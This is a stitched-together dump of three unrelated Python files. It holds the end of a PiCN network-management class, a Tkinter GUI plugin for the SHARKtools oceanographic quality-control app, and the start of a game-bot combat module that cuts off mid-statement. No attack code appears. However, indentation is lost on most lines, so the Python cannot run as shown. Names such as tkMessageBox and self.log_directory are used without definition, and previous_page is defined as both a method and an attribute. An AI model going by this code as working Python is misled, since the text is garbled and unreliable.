"""Mgmt System for PiCN"""
def __init__(self, cs: BaseContentStore, fib: BaseForwardingInformationBase, pit: BasePendingInterestTable,
linklayer: LayerProcess, port: int, shutdown=None,
repo_prfx: str = None, repo_path: str = None, log_level=255):
super().__init__("MgmtSys", log_level)
self.cs = cs
self.fib = fib
self.pit = pit
self._linklayer = linklayer
self._repo_prfx = repo_prfx
self._repo_path = repo_path
self._port: int = port
# init MGMT
self.mgmt_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.mgmt_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.mgmt_sock.bind(("127.0.0.1", self._port))
self.mgmt_sock.listen(5)
self._buffersize = 8192
        if os.name != 'nt':
self.shutdown = shutdown # function pointer
else:
self.logger.critical("Shutdown not available on NT platform")
def mgmt(self, mgmt_sock):
"""parse mgmt message"""
replysock, addr = mgmt_sock.accept()
try:
# receive data
data = replysock.recv(self._buffersize)
request_string = data.decode()
# Parse HTTP
fields = request_string.split("\r\n")
request: str = fields[0]
fields = fields[1:]
type, name = request.split(" ", 1)
httpversion = request.rsplit(" ", 1)[-1]
http = {}
for field in fields:
if (len(field.split(":")) == 2):
key, value = field.split(':', 1)
http[key] = value
# Execute MGMT
name = name.replace(" HTTP/1.1", "")
mgmt_request = name.split("/")
if (len(mgmt_request) == 4):
layer = mgmt_request[1]
command = mgmt_request[2]
params = mgmt_request[3]
if (layer == "linklayer"):
self.ll_mgmt(command, params, replysock)
elif(layer == "icnlayer"):
self.icnl_mgmt(command, params, replysock)
elif(layer == "repolayer"):
self.repol_mgmt(command, params, replysock)
elif len(mgmt_request) == 2:
if mgmt_request[1] == "shutdown":
self.logger.info("Shutdown")
replysock.send("HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n shutdown\r\n".encode())
replysock.close()
time.sleep(2)
self.shutdown()
finally:
replysock.close()
def ll_mgmt(self, command, params, replysock):
# newface expects /linklayer/newface/ip:port
if (command == "newface"):
ip, port, if_num = params.split(":", 2)
if port != 'None':
port = int(port)
if_num = int(if_num)
if if_num >= len(self._linklayer.interfaces):
replysock.send(f"Interface Number {if_num} does not exit on node".encode())
return
if port != 'None':
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo((ip, port), if_num))
else:
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo(ip, if_num))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newface OK:" + str(fid) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Face added " + ip + "|" + str(port) + ", FaceID: " + str(fid))
else:
self.unknown_command(replysock)
return
def icnl_mgmt(self, command, params, replysock):
        if self.cs is None or self.fib is None or self.pit is None:
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Forwarder OK\r\n"
replysock.send(reply.encode())
# newface expects /linklayer/newface/ip:port
elif (command == "newforwardingrule"):
prefix, faceid = params.split(":", 1)
faceid_str = faceid
faceid = faceid.split(',')
faceid = list(map(lambda x: int(x), faceid))
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
self.fib.add_fib_entry(name, faceid, True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newforwardingrule OK:" + str(faceid_str) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Forwardingrule added " + prefix + "|" + str(faceid))
return
elif(command == "newcontent"):
prefix, content = params.split(":", 1)
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
content = Content(name, content)
self.cs.add_content_object(content, static=True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newcontent OK\r\n"
replysock.send(reply.encode())
self.logger.info("New content added " + prefix + "|" + content.content)
return
else:
self.unknown_command(replysock)
return
def repol_mgmt(self, command, params, replysock):
        if self._repo_path is None or self._repo_prfx is None:
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Repo OK\r\n"
replysock.send(reply.encode())
elif(command == "getprefix"):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(self._repo_prfx) + " OK\r\n"
replysock.send(reply.encode())
elif(command =="getpath"):
abs_path = os.path.abspath(str(self._repo_path))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(abs_path) + " OK\r\n"
replysock.send(reply.encode())
else:
self.unknown_command(replysock)
return
def unknown_command(self, replysock):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Unknown Command\r\n"
replysock.send(reply.encode())
def _run_select(self, mgmt_sock):
while True:
socks = [mgmt_sock]
ready_vars, _, _ = select.select(socks, [], [])
self.mgmt(mgmt_sock)
def _run_poll(self, mgmt_sock):
poller = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
poller.register(mgmt_sock, READ_ONLY)
while True:
ready_vars = poller.poll()
self.mgmt(mgmt_sock)
def _run(self, mgmt_sock):
        if os.name == 'nt':
self._run_select(mgmt_sock)
else:
self._run_poll(mgmt_sock)
def start_process(self):
self._process = multiprocessing.Process(target=self._run, args=[self.mgmt_sock])
self._process.start()
def stop_process(self):
if self._process is not None:
self._process.terminate()
self._process = None
self.mgmt_sock.close()
def __del__(self):
try:
self.mgmt_sock.close()
except:
pass
|
app.py
|
# Copyright (c) 2018 SMHI, Swedish Meteorological and Hydrological Institute
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
# To use basemap you might need to install Microsoft Visual C++: https://visualstudio.microsoft.com/visual-cpp-build-tools/
import os
import threading
import tkinter as tk
from tkinter import filedialog
from tkinter import ttk
import matplotlib.pyplot as plt
import sharkpylib as spl
import sharkpylib.tklib.tkinter_widgets as tkw
from sharkpylib import gismo
from sharkpylib.file.file_handlers import SamplingTypeSettingsDirectory, MappingDirectory
from sharkpylib.gismo.exceptions import *
import core
import gui as main_gui
from plugins.SHARKtools_qc_sensors import gui
from plugins.plugin_app import PluginApp
ALL_PAGES = dict()
ALL_PAGES['PageStart'] = gui.PageStart
ALL_PAGES['PageTimeSeries'] = gui.PageTimeSeries
ALL_PAGES['PageMetadata'] = gui.PageMetadata
ALL_PAGES['PageProfile'] = gui.PageProfile
ALL_PAGES['PageSamplingTypeSettings'] = gui.PageSamplingTypeSettings
ALL_PAGES['PageUser'] = gui.PageUser
APP_TO_PAGE = dict()
for page_name, page in ALL_PAGES.items():
APP_TO_PAGE[page] = page_name
class App(PluginApp):
"""
This class contains the main window (page), "container", for
the SHARKtools application.
Additional pages in the application are stored under self.frames.
The container is the parent frame that is passed to other pages.
self is also passed to the other pages objects and should there be given the name
"self.main_app".
Toolbox settings and logfile can be reached in all page objects by calling
"self.main_app.settings" and "self.main_app.logfile" respectivly.
"""
#===========================================================================
def __init__(self, parent, main_app, **kwargs):
PluginApp.__init__(self, parent, main_app, **kwargs)
# parent is the frame "container" in App. contoller is the App class
self.parent = parent
self.main_app = main_app
self.version = '2019.01.1'
# TODO: Move version to __version__
self.info_popup = self.main_app.info_popup
self.logger = self.main_app.logger
self.plugin_directory = os.path.dirname(os.path.abspath(__file__))
self.root_directory = self.main_app.root_directory
self.users_directory = self.main_app.users_directory
# def get_user_settings(self):
# return [('basic', 'test_setting')]
def startup(self):
"""
Updated 20181002
"""
self.sampling_types_factory = gismo.sampling_types.PluginFactory()
self.qc_routines_factory = gismo.qc_routines.PluginFactory()
        # Setting up GUI logger
if not os.path.exists(self.log_directory):
os.makedirs(self.log_directory)
self.logger = self.main_app.logger
# Load settings files object
self.settings_files = SamplingTypeSettingsDirectory()
self.mapping_files = MappingDirectory()
# self.settings = self.main_app.settings
self.user_manager = self.main_app.user_manager
self.user = self.main_app.user
self.session = spl.gismo.GISMOsession(root_directory=self.root_directory,
users_directory=self.users_directory,
log_directory=self.log_directory,
user=self.user.name,
sampling_types_factory=self.sampling_types_factory,
qc_routines_factory=self.qc_routines_factory,
save_pkl=False)
self.default_platform_settings = None
self._create_titles()
self.all_ok = True
self.active_page = None
self.previous_page = None
self.admin_mode = False
self.progress_running = False
self.progress_running_toplevel = False
self.latest_loaded_sampling_type = ''
self._set_frame()
self.startup_pages()
# Show start page given in settings.ini
self.page_history = ['PageUser']
self.show_frame('PageStart')
def update_page(self):
self.user = self.user_manager.user
default_plot_style = self.user_manager.get_app_settings('default', 'plot style', 'seaborn')
        plt.style.use(self.user.layout.setdefault('plotstyle', default_plot_style))
self.update_all()
#==========================================================================
def _set_frame(self):
self.frame_top = tk.Frame(self)
self.frame_mid = tk.Frame(self)
self.frame_bot = tk.Frame(self)
# Grid
self.frame_top.grid(row=0, column=0, sticky="nsew")
self.frame_mid.grid(row=1, column=0, sticky="nsew")
self.frame_bot.grid(row=2, column=0, sticky="nsew")
# Gridconfigure
tkw.grid_configure(self, nr_rows=3, r0=100, r1=5, r2=1)
#----------------------------------------------------------------------
# Frame top
        # Create the container that will hold (show) all frames
        self.container = tk.Frame(self.frame_top)
self.container.grid(row=0, column=0, sticky="nsew")
tkw.grid_configure(self.frame_top)
#----------------------------------------------------------------------
# Frame mid
self.frame_add = tk.LabelFrame(self.frame_mid)
self.frame_loaded = tk.LabelFrame(self.frame_mid, text='Loaded files')
# Grid
self.frame_add.grid(row=0, column=0, sticky="nsew")
self.frame_loaded.grid(row=0, column=1, sticky="nsew")
# Gridconfigure
tkw.grid_configure(self.frame_mid, nr_columns=2)
#----------------------------------------------------------------------
# Frame bot
self._set_frame_bot()
self._set_frame_add_file()
self._set_frame_loaded_files()
def _set_frame_bot(self):
self.frame_info = tk.Frame(self.frame_bot)
self.frame_info.grid(row=0, column=0, sticky="nsew")
self.frame_progress = tk.Frame(self.frame_bot)
self.progress_widget = tkw.ProgressbarWidget(self.frame_progress, sticky='nsew')
# self.info_widget = tkw.LabelFrameLabel(self.frame_info, pack=False)
tkw.grid_configure(self.frame_info)
tkw.grid_configure(self.frame_bot)
def run_progress(self, run_function, message=''):
        def run_thread():
            try:
                self.progress_widget.run_progress(run_function, message=message)
            finally:
                # clear the flag when the work actually finishes, not right
                # after the worker thread has been started
                self.progress_running = False
        if self.progress_running:
            main_gui.show_information('Progress is running', 'A progress is running, please wait until it is finished!')
            return
        self.progress_running = True
        threading.Thread(target=run_thread).start()
def run_progress_in_toplevel(self, run_function, message=''):
"""
Rins progress in a toplevel window.
:param run_function:
:param message:
:return:
"""
def run_thread():
self.frame_toplevel_progress = tk.Toplevel(self)
self.progress_widget_toplevel = tkw.ProgressbarWidget(self.frame_toplevel_progress, sticky='nsew', in_rows=True)
self.frame_toplevel_progress.update_idletasks()
self.progress_widget_toplevel.update_idletasks()
self.progress_widget.run_progress(run_function, message=message)
self.frame_toplevel_progress.destroy()
if self.progress_running_toplevel:
self.main_app.show_information('Progress is running', 'A progress is running, please wait until it is finished!')
return
self.progress_running = True
# run_thread = lambda: self.progress_widget.run_progress(run_function, message=message)
threading.Thread(target=run_thread).start()
self.progress_running = False
#===========================================================================
def startup_pages(self):
self.pages_started = dict()
self.frames = {}
# Looping all pages to make them active.
for page_name, Page in ALL_PAGES.items(): # Capital P to emphasize class
# Destroy old page if called as an update
try:
self.frames[page_name].destroy()
print(Page, u'Destroyed')
            except Exception:
pass
frame = Page(self.container, self)
frame.grid(row=0, column=0, sticky="nsew")
self.container.rowconfigure(0, weight=1)
self.container.columnconfigure(0, weight=1)
self.frames[page_name] = frame
self.activate_binding_keys()
def _set_load_frame(self):
self._set_frame_add_file()
self._set_frame_loaded_files()
def _set_frame_add_file(self):
# Three main frames
frame = self.frame_add
frame_data = tk.LabelFrame(frame, text='Get data file')
frame_settings = tk.LabelFrame(frame, text='Settings file')
frame_sampling_type = tk.LabelFrame(frame, text='Sampling type')
frame_platform_depth = tk.LabelFrame(frame, text='Platform depth')
frame_load = tk.Frame(frame)
# Grid
padx=5
pady=5
frame_data.grid(row=0, column=0, columnspan=4, sticky='nsew', padx=padx, pady=pady)
frame_settings.grid(row=1, column=0, sticky='nsew', padx=padx, pady=pady)
frame_sampling_type.grid(row=1, column=1, sticky='nsew', padx=padx, pady=pady)
frame_platform_depth.grid(row=1, column=2, sticky='nsew', padx=padx, pady=pady)
frame_load.grid(row=1, column=3, sticky='nsew', padx=padx, pady=pady)
# Gridconfigure
tkw.grid_configure(frame, nr_rows=2, nr_columns=4, r0=50)
#----------------------------------------------------------------------
# Data frame
self.button_get_ferrybox_data_file = tk.Button(frame_data, text='Ferrybox CMEMS',
command=lambda: self._get_data_file_path('Ferrybox CMEMS'))
self.button_get_fixed_platform_data_file = tk.Button(frame_data, text='Fixed platform CMEMS',
command=lambda: self._get_data_file_path('Fixed platforms CMEMS'))
self.button_get_ctd_data_file = tk.Button(frame_data, text='DV CTD standard format',
command=lambda: self._get_data_file_paths('CTD DV'))
self.button_get_ctd_nodc_data_file = tk.Button(frame_data, text='NODC CTD standard format',
command=lambda: self._get_data_file_paths('CTD NODC'))
self.button_get_sampling_file = tk.Button(frame_data, text='SHARKweb bottle data',
command=lambda: self._get_data_file_path('PhysicalChemical SHARK'))
# tkw.disable_widgets(self.button_get_ctd_data_file)
self.stringvar_data_file = tk.StringVar()
self.entry_data_file = tk.Entry(frame_data, textvariable=self.stringvar_data_file, state='disabled')
# Grid
padx=5
pady=5
self.button_get_ferrybox_data_file.grid(row=0, column=0, padx=padx, pady=pady, sticky='nsew')
self.button_get_fixed_platform_data_file.grid(row=0, column=1, padx=padx, pady=pady, sticky='nsew')
self.button_get_ctd_data_file.grid(row=0, column=2, padx=padx, pady=pady, sticky='nsew')
self.button_get_ctd_nodc_data_file.grid(row=0, column=3, padx=padx, pady=pady, sticky='nsew')
self.button_get_sampling_file.grid(row=0, column=4, padx=padx, pady=pady, sticky='nsew')
self.entry_data_file.grid(row=1, column=0, columnspan=5, padx=padx, pady=pady, sticky='nsew')
# Grid configure
tkw.grid_configure(frame_data, nr_rows=2, nr_columns=5)
# Settings frame
self.combobox_widget_settings_file = tkw.ComboboxWidget(frame_settings,
items=[],
title='',
callback_target=self._save_type_and_file,
prop_combobox={'width': 40},
column=0,
columnspan=1,
row=0,
sticky='nsew')
self._update_settings_combobox_widget()
self.button_import_settings_file = ttk.Button(frame_settings, text='Import settings file', command=self._import_settings_file)
self.button_import_settings_file.grid(row=0, column=1, padx=padx, pady=pady, sticky='nsew')
tkw.grid_configure(frame_settings, nr_rows=1, nr_columns=2)
#----------------------------------------------------------------------
# Sampling type frame
self.combobox_widget_sampling_type = tkw.ComboboxWidget(frame_sampling_type,
items=sorted(self.session.get_sampling_types()),
title='',
callback_target=self._save_type_and_file,
prop_combobox={'width': 30},
column=0,
columnspan=1,
row=0,
sticky='nsew')
# Platform depth frame
self.entry_widget_platform_depth = tkw.EntryWidget(frame_platform_depth, entry_type='int',
prop_entry=dict(width=5), row=0, column=0,
padx=padx, pady=pady, sticky='nsew')
self.entry_widget_platform_depth.disable_widget()
tk.Label(frame_platform_depth, text='meters').grid(row=0, column=1, padx=padx, pady=pady, sticky='nsew')
tkw.grid_configure(frame_platform_depth)
# Gridconfigure
tkw.grid_configure(frame_sampling_type)
# Load file button
self.button_load_file = tk.Button(frame_load, text='Load file', command=self._load_file, bg='lightgreen', font=(30))
self.button_load_file.grid(row=0, column=0, padx=padx, pady=pady, sticky='nsew')
self.button_load_file.configure(state='disabled')
tkw.grid_configure(frame_load)
def _update_settings_combobox_widget(self):
self.combobox_widget_settings_file.update_items(self.settings_files.get_list())
#===========================================================================
def _set_frame_loaded_files(self):
"""
Created 20180821
"""
frame = self.frame_loaded
prop_listbox = {'height': 4}
self.listbox_widget_loaded_files = tkw.ListboxWidget(frame,
include_delete_button=False,
# include_delete_button='Remove source',
prop_listbox=prop_listbox,
callback_delete_button=self._delete_source,
padx=1,
pady=1)
tkw.grid_configure(frame)
def _delete_source(self, file_id, *args, **kwargs):
file_id = file_id.split(':')[-1].strip()
self.session.remove_file(file_id)
self.update_all()
def _get_data_file_paths(self, sampling_type):
open_directory = self.get_open_directory(sampling_type)
file_paths = filedialog.askopenfilenames(initialdir=open_directory,
filetypes=[('GISMO-file ({})'.format(sampling_type), '*.txt')])
if file_paths:
self.set_open_directory(file_paths[0], sampling_type)
self.combobox_widget_sampling_type.set_value(sampling_type)
file_path_list = []
for nr, file_path in enumerate(file_paths):
file_name = os.path.basename(file_path)
            if sampling_type == 'CTD DV' and not file_name.startswith('ctd_profile_'):
                continue
            if sampling_type == 'CTD NODC' and not file_name.startswith('nodc_ctd_profile_'):
                continue
            if nr == 0:
                # keep the full path for the first file; later entries store the
                # file name only (the directory is reconstructed when loading)
                file_path_list.append(file_path)
            else:
                file_path_list.append(file_name)
if not file_path_list:
            self.logger.info(f'No files match the file name convention for sampling_type "{sampling_type}"')
            self.main_app.update_help_information(f'No files match the file name convention for sampling_type "{sampling_type}"')
self.stringvar_data_file.set('; '.join(file_path_list))
self._set_settings(sampling_type, file_paths[0])
def _get_data_file_path(self, sampling_type):
"""
Created 20180821
"""
open_directory = self.get_open_directory(sampling_type)
file_path = filedialog.askopenfilename(initialdir=open_directory,
filetypes=[('GISMO-file ({})'.format(sampling_type), '*.txt')])
if file_path:
self.set_open_directory(file_path, sampling_type)
self.combobox_widget_sampling_type.set_value(sampling_type)
self.stringvar_data_file.set(file_path)
self._set_settings(sampling_type, file_path)
def _save_type_and_file(self):
if not self.latest_loaded_sampling_type:
return
s_type = self.combobox_widget_sampling_type.get_value()
if s_type:
self.user.file_type.set(self.latest_loaded_sampling_type, 'sampling_type', s_type)
s_file = self.combobox_widget_settings_file.get_value()
if s_file:
self.user.file_type.set(self.latest_loaded_sampling_type, 'settings_file', s_file)
def _set_settings(self, sampling_type, file_path):
if file_path:
self.latest_loaded_sampling_type = sampling_type
s_type = self.user.file_type.setdefault(sampling_type, 'sampling_type', '')
if s_type:
self.combobox_widget_sampling_type.set_value(s_type)
# Settings file
s_file = self.user.file_type.setdefault(sampling_type, 'settings_file', '')
if s_file:
self.combobox_widget_settings_file.set_value(s_file)
self.info_popup.show_information(core.texts.data_file_selected(username=self.user.name))
if 'fixed platform' in sampling_type.lower():
self.entry_widget_platform_depth.enable_widget()
temp_file_id = os.path.basename(file_path)[:10]
depth = self.user.sampling_depth.setdefault(temp_file_id, 1)
self.entry_widget_platform_depth.set_value(depth)
else:
self.entry_widget_platform_depth.set_value('')
self.entry_widget_platform_depth.disable_widget()
self.button_load_file.configure(state='normal')
else:
self.button_load_file.configure(state='disabled')
self.entry_widget_platform_depth.set_value('')
self.entry_widget_platform_depth.disable_widget()
def _import_settings_file(self):
open_directory = self.get_open_directory()
file_path = filedialog.askopenfilename(initialdir=open_directory,
filetypes=[('GISMO Settings file', '*.ini')])
if not file_path:
return
self.set_open_directory(file_path)
self.settings_files.import_file(file_path)
self._update_settings_combobox_widget()
def get_open_directory(self, suffix=None):
if suffix:
string = f'open_directory_{suffix.replace(" ", "_")}'
else:
string = 'open_directory'
return self.user.path.setdefault(string, self.user_manager.get_app_settings('directory', 'input directory'))
def set_open_directory(self, directory, suffix=None):
if os.path.isfile(directory):
directory = os.path.dirname(directory)
if suffix:
string = f'open_directory_{suffix.replace(" ", "_")}'
else:
string = 'open_directory'
self.user.path.set(string, directory)
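    # A hedged usage sketch of the two helpers above ('Ferrybox CMEMS' is one of
    # the sampling types used in this file; the path is hypothetical):
    #
    #     self.set_open_directory('/data/in/file.txt', 'Ferrybox CMEMS')
    #
    # stores '/data/in' under the user path key 'open_directory_Ferrybox_CMEMS',
    # and self.get_open_directory('Ferrybox CMEMS') reads it back.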
def _load_file(self):
def load_file(data_file_path, **kwargs):
self.main_app.update_help_information('')
self.button_load_file.configure(state='disabled')
settings_file = self.combobox_widget_settings_file.get_value()
sampling_type = self.combobox_widget_sampling_type.get_value()
self.session.load_file(sampling_type=sampling_type,
data_file_path=data_file_path,
settings_file=settings_file,
# settings_file_path=settings_file_path,
reload=False,
root_directory=self.root_directory,
**kwargs)
# self.reset_help_information()
data_file_path = self.stringvar_data_file.get()
settings_file = self.combobox_widget_settings_file.get_value()
settings_file_path = self.settings_files.get_path(settings_file)
# sampling_type = self.combobox_widget_sampling_type.get_value()
if not all([data_file_path, settings_file_path]):
self.main_app.update_help_information('No file selected!', fg='red')
return
data_file_path = self.stringvar_data_file.get()
if ';' in data_file_path:
data_file_list = []
directory = None
for k, file_name in enumerate(data_file_path.split(';')):
file_name = file_name.strip()
if k == 0:
directory = os.path.dirname(file_name)
data_file_list.append(file_name)
else:
data_file_list.append(os.path.join(directory, file_name))
else:
data_file_list = [data_file_path]
for file_path in data_file_list:
# Load file
try:
load_file(file_path)
# self.run_progress(load_file, message='Loading file...please wait...')
except GISMOExceptionMissingPath as e:
self.logger.debug(e)
                main_gui.show_information('Invalid path',
                                          'The path "{}" given in settings file "{}" cannot be found'.format(
                                              e.message, settings_file_path))
self.main_app.update_help_information('Please try again with a different settings file.')
except GISMOExceptionMissingInputArgument as e:
self.logger.debug(e)
if 'depth' in e.message:
platform_depth = self.entry_widget_platform_depth.get_value()
if not platform_depth:
main_gui.show_information('No depth found!',
'You need to provide platform depth for this sampling type!')
return
load_file(file_path, depth=platform_depth)
except GISMOExceptionInvalidParameter as e:
self.logger.debug(e)
main_gui.show_information('Invalid parameter',
f'Could not find parameter {e}. Settings file might have wrong information.')
return
except GISMOExceptionQCfieldError:
main_gui.show_error('QC field error',
f'Something is wrong with the qf columns in file: {file_path}')
return
except Exception as e:
self.logger.debug(e)
main_gui.show_internal_error(e)
return
self.stringvar_data_file.set('')
self._update_loaded_files_widget()
self.update_all()
self.button_load_file.configure(state='normal')
self.main_app.update_help_information('File loaded! Please continue.', bg='green')
def _update_loaded_files_widget(self):
loaded_files = []
for sampling_type in self.session.get_sampling_types():
for file_id in self.session.get_file_id_list(sampling_type):
loaded_files.append('{}: {}'.format(sampling_type, file_id))
self.listbox_widget_loaded_files.update_items(loaded_files)
def get_loaded_files_list(self):
"""
Returns a list with the items in self.listbox_widget_loaded_files
:return:
"""
return self.listbox_widget_loaded_files.items[:]
#===========================================================================
def _quick_run_F1(self, event):
try:
self.show_frame(main_gui.PageCTD)
except:
pass
#===========================================================================
def _quick_run_F2(self, event):
pass
#===========================================================================
def _quick_run_F3(self, event):
pass
#===========================================================================
def activate_binding_keys(self):
"""
Load binding keys
"""
self.bind("<Home>", lambda event: self.show_frame(gui.PageStart))
self.bind("<Escape>", lambda event: self.show_frame(gui.PageStart))
self.bind("<F1>", self._quick_run_F1)
self.bind("<F2>", self._quick_run_F2)
self.bind("<F3>", self._quick_run_F3)
def add_working_indicator(self):
pass
# self.update_help_information(u'Loading...')
# self.working_indicator = tk.Label(self, text=u'Loading...',
# fg=u'red',
# font=("Helvetica", 16, u'italic'))
# self.working_indicator.grid(row=0, column=0)
def delete_working_indicator(self):
pass
# self.update_help_information(None)
# self.working_indicator.destroy()
# def update_help_information(self, text='', **kwargs):
# """
# Created 20180822
# """
# kw = dict(bg=self.cget('bg'),
# fg='black')
# kw.update(kwargs)
# self.info_widget.set_text(text, **kw)
# self.logger.debug(text)
# def reset_help_information(self):
# """
# Created 20180822
# """
# self.info_widget.reset()
def update_all(self):
for page_name, frame in self.frames.items():
if self.pages_started.get(page_name):
                self.logger.debug(f'Updating page: {page_name}')
frame.update_page()
#===========================================================================
def show_frame(self, page_name):
"""
This method brings the given Page to the top of the GUI.
Before "raise" call frame startup method.
This is so that the Page only loads ones.
"""
load_page = True
frame = self.frames[page_name]
if not self.pages_started.get(page_name, None):
frame.startup()
self.pages_started[page_name] = True
#-----------------------------------------------------------------------
if load_page:
frame.tkraise()
            self.previous_page = self.active_page
            self.active_page = page_name
            # Check page history
            if page_name in self.page_history:
                self.page_history.pop()
            self.page_history.append(page_name)
            frame.update_page()
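    # Hedged illustration of the lazy startup above, where page_key is any key
    # registered in ALL_PAGES (elsewhere in this file both names and page
    # classes are passed in):
    #
    #     app.show_frame(page_key)   # first call runs frame.startup() once
    #     app.show_frame(page_key)   # later calls only raise and update the frame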
    def _show_frame(self, page):
        self.withdraw()
        # delegate to show_frame inside a progress dialog (calling _show_frame
        # here, as the old code did, would recurse forever)
        self.run_progress_in_toplevel(lambda x=page: self.show_frame(x), 'Opening page, please wait...')
        self.deiconify()
#===========================================================================
    def goto_previous_page(self, event):
        if self.previous_page:
            self.show_frame(self.previous_page)
#===========================================================================
    def previous_page(self, event):
        # NOTE: this method is shadowed by the instance attribute of the same
        # name that show_frame assigns, and the index lookup result is unused.
        self.page_history.index(self.active_page)
#===========================================================================
def update_app(self):
"""
Updates all information about loaded series.
"""
self.update_all()
#===========================================================================
    def quit_toolbox(self):
        if self.settings.settings_are_modified:
            save_settings = tkMessageBox.askyesnocancel(u'Save core.Settings?',
                                                        u'You have made one or more changes to the '
                                                        u'toolbox settings during this session.\n'
                                                        u'Do you want to make these changes permanent?')
            if save_settings is None:
                # Cancel: abort quitting
                return
            if save_settings:
                self.settings.save_settings()
                self.settings.settings_are_modified = False
        self.destroy()  # Closes window
        self.quit()  # Terminates program
#===========================================================================
def _get_title(self, page):
if page in self.titles:
return self.titles[page]
else:
return ''
#===========================================================================
def _create_titles(self):
self.titles = {}
try:
self.titles[gui.PageFerrybox] = 'Ferrybox'
except:
pass
try:
self.titles[gui.PageFixedPlatforms] = 'Buoy'
except:
pass
try:
self.titles[gui.PageProfile] = 'Profiles'
except:
pass
try:
self.titles[gui.PageTimeSeries] = 'Time Series'
except:
pass
|
combat.py
|
import math
import string
from datetime import datetime, timedelta
from util.logger import Logger
from util.utils import Region, Utils
from scipy import spatial
from threading import Thread
class CombatModule(object):
def __init__(self, config, stats, retirement_module, enhancement_module):
"""Initializes the Combat module.
Args:
config (Config): ALAuto Config instance.
stats (Stats): ALAuto Stats instance.
retirement_module (RetirementModule): ALAuto RetirementModule instance.
enhancement_module (EnhancementModule): ALAuto EnhancementModule instance.
"""
self.enabled = True
self.config = config
self.stats = stats
self.retirement_module = retirement_module
self.enhancement_module = enhancement_module
self.chapter_map = self.config.combat['map']
Utils.small_boss_icon = config.combat['small_boss_icon']
self.exit = 0
self.combats_done = 0
self.enemies_list = []
self.mystery_nodes_list = []
self.blacklist = []
self.movement_event = {}
self.kills_count = 0
self.kills_before_boss = {
'1-1': 1, '1-2': 2, '1-3': 2, '1-4': 3,
'2-1': 2, '2-2': 3, '2-3': 3, '2-4': 3,
'3-1': 3, '3-2': 3, '3-3': 3, '3-4': 3,
'4-1': 3, '4-2': 3, '4-3': 3, '4-4': 4,
'5-1': 4, '5-2': 4, '5-3': 4, '5-4': 4,
'6-1': 4, '6-2': 4, '6-3': 4, '6-4': 5,
'7-1': 5, '7-2': 5, '7-3': 5, '7-4': 5,
'8-1': 4, '8-2': 4, '8-3': 4, '8-4': 4,
'9-1': 5, '9-2': 5, '9-3': 5, '9-4': 5,
'10-1': 6, '10-2': 6, '10-3': 6, '10-4': 6,
'11-1': 6, '11-2': 6, '11-3': 6, '11-4': 6,
'12-1': 6, '12-2': 6, '12-3': 6, '12-4': 6,
'13-1': 6, '13-2': 6, '13-3': 6, '13-4': 7
}
if self.chapter_map not in self.kills_before_boss:
# check if current map is present in the dictionary and if it isn't,
# a new entry is added with kills_before_boss value
self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
elif self.config.combat['kills_before_boss'] != 0:
# updates default value with the one provided by the user
self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
self.region = {
'fleet_lock': Region(1790, 750, 130, 30),
'open_strategy_menu': Region(1797, 617, 105, 90),
'disable_subs_hunting_radius': Region(1655, 615, 108, 108),
'close_strategy_menu': Region(1590, 615, 40, 105),
'menu_button_battle': Region(1517, 442, 209, 206),
'map_summary_go': Region(1289, 743, 280, 79),
'fleet_menu_go': Region(1485, 872, 270, 74),
'combat_ambush_evade': Region(1493, 682, 208, 56),
'combat_com_confirm': Region(848, 740, 224, 56),
'combat_end_confirm': Region(1520, 963, 216, 58),
'combat_dismiss_surface_fleet_summary': Region(790, 950, 250, 65),
'menu_combat_start': Region(1578, 921, 270, 70),
'tap_to_continue': Region(661, 840, 598, 203),
'close_info_dialog': Region(1326, 274, 35, 35),
'dismiss_ship_drop': Region(1228, 103, 692, 735),
'retreat_button': Region(1130, 985, 243, 60),
'dismiss_commission_dialog': Region(1065, 732, 235, 68),
'normal_mode_button': Region(88, 990, 80, 40),
'map_nav_right': Region(1831, 547, 26, 26),
'map_nav_left': Region(65, 547, 26, 26),
'event_button': Region(1770, 250, 75, 75),
'lock_ship_button': Region(1086, 739, 200, 55),
'clear_second_fleet': Region(1690, 473, 40, 40),
'button_switch_fleet': Region(1430, 985, 240, 60),
'menu_nav_back': Region(54, 57, 67, 67)
}
self.swipe_counter = 0
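    # Hedged usage sketch for this module (arguments as documented in __init__):
    #
    #     combat = CombatModule(config, stats, retirement_module, enhancement_module)
    #     result = combat.combat_logic_wrapper()
    #     # result: 1 = boss defeated, 2 = retreated after the configured number
    #     # of fights, 3 = morale too low, 4 = dock full, 5 = fleet defeated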
def combat_logic_wrapper(self):
"""Method that fires off the necessary child methods that encapsulates
the entire action of sortieing combat fleets and resolving combat.
Returns:
int: 1 if boss was defeated, 2 if successfully retreated after the specified
number of fights, 3 if morale is too low, 4 if dock is full and unable to
free it and 5 if fleet was defeated.
"""
self.exit = 0
self.start_time = datetime.now()
        # enhancement and retirement flags
enhancement_failed = False
retirement_failed = False
# get to map
map_region = self.reach_map()
Utils.touch_randomly(map_region)
while True:
Utils.wait_update_screen()
if self.exit == 1 or self.exit == 2:
self.stats.increment_combat_done()
time_passed = datetime.now() - self.start_time
if self.stats.combat_done % self.config.combat['retire_cycle'] == 0 or ((self.config.commissions['enabled'] or \
self.config.dorm['enabled'] or self.config.academy['enabled']) and time_passed.total_seconds() > 3600) or \
